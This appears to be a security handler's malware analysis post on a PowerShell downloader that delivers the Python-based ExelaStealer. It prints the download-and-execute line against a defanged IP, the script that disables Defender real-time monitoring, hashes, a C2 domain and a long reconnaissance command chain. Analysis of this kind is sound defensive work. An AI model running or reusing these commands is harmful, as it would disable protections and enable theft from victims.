ExelaStealer Delivered "From Russia With Love"
Some simple PowerShell scripts might deliver nasty content if executed by the target. I found a very simple one (with a low VT score of 8/65):
$webclient = New-Object System.Net.WebClient $webclient.Headers.Add("X-Requested-With", "PowerShell") $script = $webclient.DownloadString("hxxp://147[.]45[.]159[.]206/open.ps1") Invoke-Expression $script
The file "open.ps1" is downloaded from Russia and contains comments in Russian like "Function of real-life security protection". It will try to disable the antivirus or, if not possible, it will ask the victim to do it!
// Decoded: "Press d when u turn off Tamper Protect!" $ready = Read-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("UHJlc3MgZCB3aGVuIHUgdHVybiBvZmYgVGFtcGVyIFByb3RlY3Qh"))) if ($ready -eq "d") { Try { Set-MpPreference -DisableRealtimeMonitoring $true Write-Host "1" } Catch { Write-Host "2" } } else { // Decoded: "Canceled!" Write-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q2FuY2VsZWQh"))) exit }
Then, the script tries to download two PE files:
- cmd.exe (SHA256: 97d6e2d922c2f69cb84341b238966555820f0b46375a9e0e1a1a19a5f42a8f96)
- service.exe (SHA256: de223760fd87d21d3548ab96e810f7c0c16aeea156905845d2e3c81e1e7df663)
"cmd.exe" is a self-extracting RAR archive:
remnux@remnux:MalwareZoo/20240726$ rar t cmd.exe RAR 5.50 Copyright (c) 1993-2017 Alexander Roshal 11 Aug 2017 Trial version Type 'rar -?' for help Testing archive cmd.exe Testing comCommon.exe OK Testing OejMizBn6qpQO.vbe OK Testing e0FFDTJuwoKvrdf9FE4ACLcGB7vDN5I0giWGmO2aDyI3QEuN.bat OK All OK
It communicates with solararbx[.]online (37.140.192.207). At this time, I'm not sure about the purpose of the RAR archive.
"service.exe" is the Exela[1] stealer, developed in Python and compiled into a PE file. It uses Discord as C2 channel. Reconnaissance is performed via a simple script:
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
[1] https://github.com/quicaxd/Exela-V2.0
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Reverse-Engineering Malware: Malware Analysis Tools and Techniques | Amsterdam | Jan 20th - Jan 25th 2025 |
Comments